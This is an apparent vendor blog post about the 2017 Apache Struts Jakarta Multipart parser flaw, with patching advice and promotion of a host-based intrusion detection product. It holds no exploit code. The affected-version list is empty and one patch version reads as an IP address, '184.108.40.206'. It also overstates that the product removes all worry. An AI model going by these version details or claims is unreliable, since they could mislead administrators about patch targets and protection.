New vulnerabilities are discovered on a regular basis, and some receive quite a bit of publicity, while others fly under the radar. The latter situation can open up extensive opportunities for attackers to exploit these vulnerabilities.
A good example of one that has been “out” for quite a while without receiving much attention in the media (and thus from organizations that may be affected) is the Apache Struts vulnerability. Today, we’d like to take a look at what it is, why it’s worthy of attention, and what you can do to protect your organization.
The Apache Struts Vulnerability: What it is and Why it Matters
Apache is the most widely distributed web server in the world. The majority of the internet’s websites are run on it. Struts, in turn, is an Apache-based open source framework for building Java web apps. It’s quite popular with large tech companies, government agencies, and financial institutions.
In March 2017, it was discovered that Apache Struts had a serious vulnerability, and since then it has been attacked in the wild on an active basis. The flaw resides specifically in the Jakarta Multipart parser upload function in Apache. Basically, it lets attackers craft malicious requests for Apache web servers, which are then able to execute on users’ systems.
Because it is such a widespread technology, the Apache Struts vulnerability has the potential to impact many organizations, and the potential fallout is dire. The attacks could be even more severe for organizations running their Apache web servers as root (not a best practice.)
This vulnerabiity is also extra-concerning because exploiting it is trivial. Hackers can easily spot vulnerable systems, the Struts exploits are publicly available, and the attack is easy to carry out and repeat. Attackers need to modify just one line of code to trick servers into downloading malicious binary from the internet.
The ubiquitousness of Apache, combined with the simplicity of executing this attack, makes it one worth paying attention to and actively protecting against.
How to Protect Against the Apache Struts Vulnerability
As far as this specific vulnerability is concerned, the Struts versions affected are:
Network administrators should immediately upgrade to 2.3.32 or 184.108.40.206 to ensure that their systems are patched against it. You can also switch to a different implementation of the parser.
However, patching isn’t always as straightforward as it sounds, since web apps may need to be rebuilt. Older apps might even have to be brought back from the dead to ensure that they aren’t offering a weak point for attackers.
It’s a good idea to get those patches done as quickly as you can, but patching quickly is not always easy or possible, especially for critical or public-facing servers. Because of this, having a real-time host-based intrusion detection system (HIDS) is important to detect these attacks when they are in their zero-day states and beyond.
Why HIDS is a Key Line of Defense
Even if you are not vulnerable to this particular type of attack, it’s a good idea to use it as an excuse to evaluate your intrusion detection capabilities. Every organization needs to have a real-time intrusion detection platform in place to protect against the likelihood that more vulnerabilities, and therefore attacks, like this will be launched in the future.
The primary value of host-based intrusion detection monitoring is that it allows you to use behavior-based indicators to immediately catch suspicious events. With a solution like the Threat Stack Cloud Security Platform®, out-of-the-box rulesets will alert you to common security events, like abnormal (or any) commands run by your Apache service user, unexpected system modifications, or anomalous connections to known command and control servers.
Baselining your system will give you a clear sense of what is “normal” for your environment, and then HIDS can be put to work catching any anomalies in real-time when they arise, not days or even hours later, after they’ve already had a chance to wreak havoc.
If you have Threat Stack installed, there’s no need to worry about the Apache vulnerability or similar ones in future, even in their zero-day state. The Threat Stack platform will alert you if there is unexpected activity in your environment, so you can respond quickly and effectively.
Final Words . . .
While the Apache vulnerability was somewhat surprising with its widespread nature and the lack of media attention, it’s safe to say that there are plenty more like it lurking in the wings, ready to make their debut, or maybe already being exploited.
Patching systems that can be patched and putting in place a robust HIDS capability will allow you to go about your business without worrying that the next Heartbleed or Shellshock or Apache Struts vulnerability will torpedo your organization.